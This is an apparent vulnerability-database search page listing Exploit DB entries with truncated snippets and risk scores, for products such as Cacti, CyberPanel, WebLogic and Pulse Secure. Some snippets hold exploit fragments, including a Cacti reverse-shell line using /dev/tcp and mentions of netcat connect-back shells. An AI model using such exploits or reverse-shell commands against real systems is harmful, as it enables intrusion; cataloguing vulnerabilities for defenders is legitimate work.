Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2016/09/27 12:0 a.m.722 views

Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Android Stagefright MP4 tx3g Integer Overflow", 'Description' = %q This module exploits a integer overflow vulnerability in the...

10CVSS7.4AI score0.87125EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/11/02 12:0 a.m.719 views

Quick N Easy FTP Service 3.2 - Unquoted Service Path

Exploit Title: Quick 'n Easy FTP Service 3.2 - Unquoted Service Path Discovery by: yunaranyancat Discovery Date: October 2020 Vendor Homepage: https://www.pablosoftwaresolutions.com/html/quickneasyftpservice.html Software Link : www.pablosoftwaresolutions.com/download.php?id=10 Tested Version: 3....

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/16 12:0 a.m.716 views

Gila CMS 1.11.8 - 'query' SQL Injection

Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection Date: 2020-06-15 Exploit Author: Carlos Ramírez L. BillyV4 Vendor Homepage: https://gilacms.com/ Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8 Version: Gila 1.11.8 Tested on: Gila 1.11.8 CVE : CVE-2020-5515 import request...

7.2CVSS7.2AI score0.26546EPSS
Exploits9
Exploit DB
Exploit DB
added 2021/08/27 12:0 a.m.712 views

CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)

Title: CyberPanel 2.1 - Remote Code Execution RCE Authenticated Date: 27.08.2021 Author: Numan Türle Vendor Homepage: https://cyberpanel.net/ Software Link: https://github.com/usmannasir/cyberpanel Version: =2.1 https://www.youtube.com/watch?v=J8iLELVgkE !/usr/bin/python3 -- coding: utf-8 --...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/16 12:0 a.m.711 views

Car Rental Management System 1.0 - 'car_id' Sql Injection

Exploit Title: Car Rental Management System 1.0 - 'carid' Sql Injection Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/08 12:0 a.m.710 views

D-Link DSR-250N 3.12 - Denial of Service (PoC)

Exploit Title: D-Link DSR-250N 3.12 - Denial of Service PoC Google Dork: N/A Author: RedTeam Pentesting GmbH Date: 2020-10-03 Exploit Author: Kiko Andreu kikoas1995 & Daniel Monzón stark0de Vendor Homepage: https://www.dlink.com Software Link:...

5.5CVSS5.5AI score0.17176EPSS
Exploits3
Exploit DB
Exploit DB
added 2021/07/14 12:0 a.m.709 views

Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)

Exploit Title: Webmin 1.973 - 'saveuser.cgi' Cross-Site Request Forgery CSRF Date: 24/04/2021 Exploit Author: Mesh3l911 & Z0ldyck Vendor Homepage: https://www.webmin.com Repo Link: https://github.com/Mesh3l911/CVE-2021-31762 Version: Webmin 1.973 Tested on: All versions POC By \0331;m...

8.8CVSS8.8AI score0.0878EPSS
Exploits6
Exploit DB
Exploit DB
added 2021/06/03 12:0 a.m.709 views

CHIYU IoT Devices - Denial of Service (DoS)

Exploit Title: CHIYU IoT Devices - Denial of Service DoS Date: 01/06/2021 Exploit Author: sirpedrotavares Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html Software Link: https://www.chiyu-tech.com/category-hardware.html Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all...

6.8CVSS6.6AI score0.4367EPSS
Exploits4
Exploit DB
Exploit DB
added 2021/03/01 12:0 a.m.709 views

FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'FortiLogger Arbitrary File Upload Exploit', 'Description' = %q This module exploits an unauthenticated arbitrary file upload via insecure POST...

9.8CVSS9.6AI score0.97512EPSS
Exploits8
Exploit DB
Exploit DB
added 2021/11/17 12:0 a.m.707 views

Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)

Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting XSS Date: 19/10/2021 Exploit Author: Vasu tamilanmkv Vendor Homepage: https://www.bludit.com Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip Version: bludit-3-13-1 Tested on: kali linux CVE : CVE-2021-35323 Steps to...

6.1CVSS6.3AI score0.05621EPSS
Exploits4
Exploit DB
Exploit DB
added 2020/01/20 12:0 a.m.707 views

Adive Framework 2.0.8 - Persistent Cross-Site Scripting

Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting Exploit Author: Sarthak Saini Dork: N/A Date: 2020-01-18 Vendor Link : https://www.adive.es/ Software Link: https://github.com/ferdinandmartin/adive-php7 Version: 2.0.8 Category: Webapps Tested on: windows64bit / mozila firefo...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2016/02/01 12:0 a.m.707 views

Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution

?php // Source: http://akat1.pl/?id=1 function getmaps $fh = fopen"/proc/self/maps", "r"; $maps = fread$fh, 331337; fclose$fh; return explode"\n", $maps; function findmap$sym $addr = 0; foreachgetmaps as $record if strstr$record, $sym && strstr$record, "r-xp" $addr = hexdecexplode'-', $record0;...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/08/12 12:0 a.m.706 views

COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection

Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection Google Dork: intitle: "COVID19 Testing Management System" Date: 09/08/2021 Exploit Author: Ashish Upsham Vendor Homepage: https://phpgurukul.com Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/19 12:0 a.m.705 views

Gitlab 12.9.0 - Arbitrary File Read (Authenticated)

Exploit Title: Gitlab 12.9.0 - Arbitrary File Read Authenticated Google Dork: - Date: 11/15/2020 Exploit Author: Jasper Rasenberg Vendor Homepage: https://about.gitlab.com Software Link: https://about.gitlab.com/install Version: tested on gitlab version 12.9.0 Tested on: Kali Linux 2020.3 You can...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/23 12:0 a.m.705 views

User Registration & Login and User Management System 2.1 - SQL Injection

Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection Dork: N/A Date: 2020-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ Versio...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/20 12:0 a.m.705 views

Mobile Shop System v1.0 - SQL Injection Authentication Bypass

Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass Exploit Author: Moaaz Taha 0xStorm Date: 2020-09-08 Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/17 12:0 a.m.705 views

College-Management-System-Php 1.0 - Authentication Bypass

Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection Exploit Author: BLAY ABU SAFIAN Inveteck Global Website: https://github.com/olotieno/College-Management-System-Php Date: 2020-06-16 Google Dork: N/A Vendor: https://github.com/olotieno/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/05/13 12:0 a.m.702 views

Firefox 72 IonMonkey - JIT Type Confusion

Exploit Title: Firefox 72 IonMonkey - JIT Type Confusion Date: 2021-05-10 Exploit Author: deadlock Forrest Orr Vendor Homepage: https://www.mozilla.org/en-US/ Software Link: https://www.mozilla.org/en-US/firefox/new/ Versions: Firefox | | /| \ | |\ / / \ | | / | | / / / / |/ | /|/ \ / / || /||...

8.8CVSS8.6AI score0.46589EPSS
Exploits7
Exploit DB
Exploit DB
added 2020/11/16 12:0 a.m.702 views

Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)

Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection Authenticated Date: 2020-11-14 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software...

0.5AI score
Exploits0
Exploit DB
Exploit DB
added 2020/05/22 12:0 a.m.702 views

WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WebLogic Server Deserialization RCE - BadAttributeValueExpException', 'Description' = %q There exists a Java object deserialization vulnerability...

9.8CVSS9.4AI score0.97116EPSS
Exploits26
Exploit DB
Exploit DB
added 2020/11/23 12:0 a.m.701 views

TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass

Exploit Title: TP-Link TL-WA855RE V5200415 - Device Reset Auth Bypass Date: 2020/07/29 Exploit Author: malwrforensics Vendor Homepage: https://tp-link.com Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855REV5200415.zip Version: TL-WA855REUSV5200415 Tested on: N/A CVE :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/09 12:0 a.m.701 views

Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection

Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection Google Dork: N/A Date: 2020-06-08 Exploit Author: Kostadin Tonev Vendor Homepage: http://virtualairlinesmanager.net Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ Version: 2.6.2 Tested on: Linux Min...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2010/02/04 12:0 a.m.700 views

Samba 3.4.5 - Symlink Directory Traversal

source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2021/11/17 12:0 a.m.699 views

SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SuiteCRM Log File Remote Code Execution', 'Description' = %q This module exploits an input validation error on the log file extension parameter. ...

8.8AI score
Exploits0
Exploit DB
Exploit DB
added 2007/06/20 12:0 a.m.699 views

Comersus Cart 7.0.7 - 'comersus_optReviewReadExec.asp?id' SQL Injection

source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. The attacker may...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2023/03/31 12:0 a.m.698 views

Cacti v1.2.22 - Remote Command Execution (RCE)

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

9.8CVSS9.8AI score0.99826EPSS
Exploits48
Exploit DB
Exploit DB
added 2021/03/19 12:0 a.m.698 views

SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF

Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF Date: 25.01.2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/03 12:0 a.m.697 views

Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting

Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting Date: 02-12-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://invisioncommunity.com/ Software Link: https://invisioncommunity.com/buy Version: 4.5.4 Tested on: Windows 10/Kali Linux CVE:...

4.8CVSS5.4AI score0.01082EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/11/24 12:0 a.m.695 views

Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service

Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service Google Dork: "Apache OpenMeetings DOS" Date: 2020-08-28 Exploit Author: SunCSR ThienNV - Sun Cyber Security Research Vendor Homepage: https://openmeetings.apache.org/ Software Link: https://openmeetings.apache.org/ Version:...

7.5CVSS7.8AI score0.70365EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/06/25 12:0 a.m.695 views

mySCADA myPRO 7 - Hardcoded Credentials

Exploit Title: mySCADA myPRO v7 Hardcoded Credentials Date: 2018-07-02 Exploit Author: Emre ÖVÜNÇ Vendor Homepage: http://myscada.org Software Link: https://www.myscada.org/mypro/ Version: v7.0.45 Tested on: Windows/Linux CVE-2018-11311 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1131...

9.1CVSS9.4AI score0.1593EPSS
Exploits5
Exploit DB
Exploit DB
added 2021/09/29 12:0 a.m.694 views

Mitrastar GPT-2541GNAC-N1 - Privilege escalation

Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation Date: 10-08-2021 Exploit Author: Leonardo Nicolas Servalli Vendor Homepage: www.mitrastar.com Platform: Mistrastar router devices GPT-2541GNAC-N1 HGU Tested on: Firmware BRg3.5100VNZ0b33 Vulnerability...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/11 12:0 a.m.694 views

Jenkins 2.235.3 - 'Description' Stored XSS

Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS Date: 11/12/2020 Exploit Author: gx1 Vendor Homepage: https://www.jenkins.io/ Software Link: https://updates.jenkins-ci.org/download/war/ Version: = 2.251 and = LTS 2.235.3 Tested on: any CVE : CVE-2020-2230 References:...

5.4CVSS5.5AI score0.83053EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/11/24 12:0 a.m.694 views

OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)

Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting Authenticated Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.opencart.com/ Software Link: https://www.opencart.com/index.php?route=cms/download Version: 3.0.3.6 Tested on: Window...

4.8CVSS5.5AI score0.01257EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/10/20 12:0 a.m.694 views

WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)

Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability Authenticated Date: 10.8.2020. Exploit Author: n1x MS-WEB Software Homepage: https://wordpress.org/plugins/wp-colorbox/ Software Link v1.1.1:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2016/09/12 12:0 a.m.694 views

MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation

!/usr/bin/python MySQL / MariaDB / Percona - Remote Root Code Execution / PrivEsc PoC Exploit CVE-2016-6662 0ldSQLMySQLRCEexploit.py ver. 1.0 For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com This is a limited version of the PoC exploit. It only...

10CVSS7.8AI score0.6773EPSS
Exploits21
Exploit DB
Exploit DB
added 2019/09/06 12:0 a.m.693 views

Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution

!/usr/bin/python Exploit Title: Pulse Secure Post-Auth Remote Code Execution Google Dork: inurl:/dana-na/ filetype:cgi Date: 09/05/2019 Exploit Author: Justin Wagner 0xDezzy, Alyssa Herrera @AlyssaHerrera Vendor Homepage: https://pulsesecure.net Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before...

8CVSS7.7AI score0.98617EPSS
Exploits12
Exploit DB
Exploit DB
added 2020/11/19 12:0 a.m.692 views

TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution

Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.4.0 throu...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/05/03 12:0 a.m.691 views

Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)

Exploit Title: Voting System 1.0 - Time based SQLI Unauthenticated SQL injection Date: 02/05/2021 Exploit Author: Syed Sheeraz Ali Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/01/07 12:0 a.m.691 views

iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information)

Exploit Title: iBall-Baton WRA150N Rom-0 Backup - File Disclosure Sensitive Information Date: 07/01/2021 Exploit Author: h4cks1n Vendor Homepage: iball.co.in Version: iBall-Baton WRA150N Tested on : Windows 7/8/8.1/10, Parrot Linux OS The iBall-Baton router version WRA150N is vulnerable to the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/30 12:0 a.m.690 views

YATinyWinFTP - Denial of Service (PoC)

Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Date: 20.08.2020 Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/01/10 12:0 a.m.690 views

TotalAV 2020 4.14.31 - Privilege Escalation

Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation Date: 2020-01-09 Exploit Author: Kusol Watchara-Apanukorn Vendor Homepage: https://www.totalav.com/ Version: 4.14.31 Fixed on: 5.3.35 Tested on: Windows 10 x64 CVE : CVE-2019-18194 Vulnerability Description: TotalAV 2020 4.14.31 has...

7.8CVSS7.8AI score0.02209EPSS
Exploits3
Exploit DB
Exploit DB
added 2021/11/11 12:0 a.m.689 views

YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)

Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection Authenticated Date: 11-10-2021 Exploit Author: tahaafarooq Vendor Homepage: https://www.yealink.com/ Version: 53.84.0.15 Tested on: YeaLink IP Phone SIP-T19P Hadrware VOIP Phone Description: Using Diagnostic tool from the...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2013/10/31 12:0 a.m.689 views

Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner

!/usr/bin/env python ap-unlock-v1337.py - apache + php 5. rem0te c0de execution exploit NOTE: - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE : - for connect back shell start netcat/nc and bind port on given host:port - is ip-range scanner not is multithreaded, but iz multithreaded iz in...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/04/19 12:0 a.m.688 views

EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path

Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Discovery by: bios Discovery Date: 2022-18-04 Vendor Homepage: https://www.easeus.com/ Tested Version: 15.1.0.0 Vulnerability Type: Unquoted Service Path Tested on OS: Microsoft Windows 10 Pro x64 Step to discover Unquote...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/10/18 12:0 a.m.688 views

Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read

Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read Date: October 16, 2021 Exploit Author: nam3lum Vendor Homepage: https://wordpress.org/plugins/duplicator/ Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip Version: 1.3.26 Tested on:...

7.5CVSS7.6AI score0.97822EPSS
Exploits11
Exploit DB
Exploit DB
added 2020/06/15 12:0 a.m.688 views

Netgear R7000 Router - Remote Code Execution

EDB Note: Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48588.zip Exploits a pre-authentication memcpy based stack buffer overflow vulnerability in httpd on several devices and versions: Device Version httpd md5sum Exploit status AC1450 V1.0.0.3610.0.17...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/23 12:0 a.m.689 views

Sky File 2.1.0 iOS - Directory Traversal

Title: Sky File 2.1.0 iOS - Directory Traversal Author: Vulnerability Laboratory Date: 2020-04-21 Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 CVE: N/A Document Title: =============== Sky File v2.1.0 iOS - Multiple Web Vulnerabilities References Source:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/08/02 12:0 a.m.687 views

Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)

Exploit Title: Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting XSS Date: 2021-08-02 Exploit Author: Mohammad Koochaki Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2008/03/06 12:0 a.m.687 views

Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal

------------------------------------------------------------------------------------ Digital Security Research Group DSecRG Advisory DSECRG-08-018 Application: Ruby 1.8.6 WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1 Versions Affected: 1.8.4 and all prior...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/04/01 12:0 a.m.686 views

phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)

Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution Authenticated Date: 29/03/2021 Exploit Author: Valerio Severini Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL7-13-0 Version: 7.13.0 or lower Tested on: Debian 10 and Ubuntu...

7.4AI score
Exploits0
Total number of security vulnerabilities5000